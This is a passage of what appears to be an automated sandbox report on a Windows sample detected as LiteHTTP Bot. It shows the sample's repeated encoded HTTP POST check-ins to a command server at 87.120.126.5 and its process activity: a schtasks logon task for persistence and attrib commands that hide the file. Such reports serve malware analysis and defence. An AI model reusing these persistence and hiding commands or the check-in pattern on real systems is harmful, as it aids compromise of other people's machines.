                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.74999687.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:53.073003054 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:53.426018953 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:53.884582996 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:53.892601967 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.74999787.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:53.120354891 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:53.473267078 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:53.953432083 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:53.960656881 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.74999887.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:26:00.272008896 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:26:00.633143902 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:26:01.089189053 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:26:01.097759008 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:26:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    24192.168.2.74999987.120.126.580
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:26:13.807681084 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:26:14.160382986 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:26:14.634841919 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:26:14.651279926 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:26:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    25192.168.2.75000087.120.126.580
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:26:18.244823933 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:26:18.597879887 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:26:19.077151060 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:26:19.087575912 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:26:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:07:22:03
                                    Start date:30/10/2024
                                    Path:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0xf80000
                                    File size:213'832 bytes
                                    MD5 hash:8391D3B5332C4B1164333DDCE388A8C7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003536000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"schtasks" /Query /TN "3u8A2xjbBT"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:08:50:52
                                    Start date:30/10/2024
                                    Path:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Imagebase:0x7c0000
                                    File size:213'832 bytes
                                    MD5 hash:8391D3B5332C4B1164333DDCE388A8C7
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:16
                                    Start time:08:51:02
                                    Start date:30/10/2024
                                    Path:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0xe50000
                                    File size:213'832 bytes
                                    MD5 hash:8391D3B5332C4B1164333DDCE388A8C7
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.0000000003037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:19
                                    Start time:08:51:22
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:08:51:22
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:08:51:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"schtasks" /Query /TN "3u8A2xjbBT"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:08:51:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:08:51:41
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:08:51:41
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:08:51:53
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"schtasks" /Query /TN "3u8A2xjbBT"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:08:51:53
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:08:51:57
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:29
                                    Start time:08:51:57
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:30
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:31
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:32
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:35
                                    Start time:08:52:16
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:36
                                    Start time:08:52:17
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:37
                                    Start time:08:52:17
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:08:52:18
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:39
                                    Start time:08:52:18
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:40
                                    Start time:08:52:22
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:41
                                    Start time:08:52:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:42
                                    Start time:08:52:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:43
                                    Start time:08:52:27
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:44
                                    Start time:08:52:27
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:45
                                    Start time:08:52:37
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:46
                                    Start time:08:52:37
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:47
                                    Start time:08:52:47
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
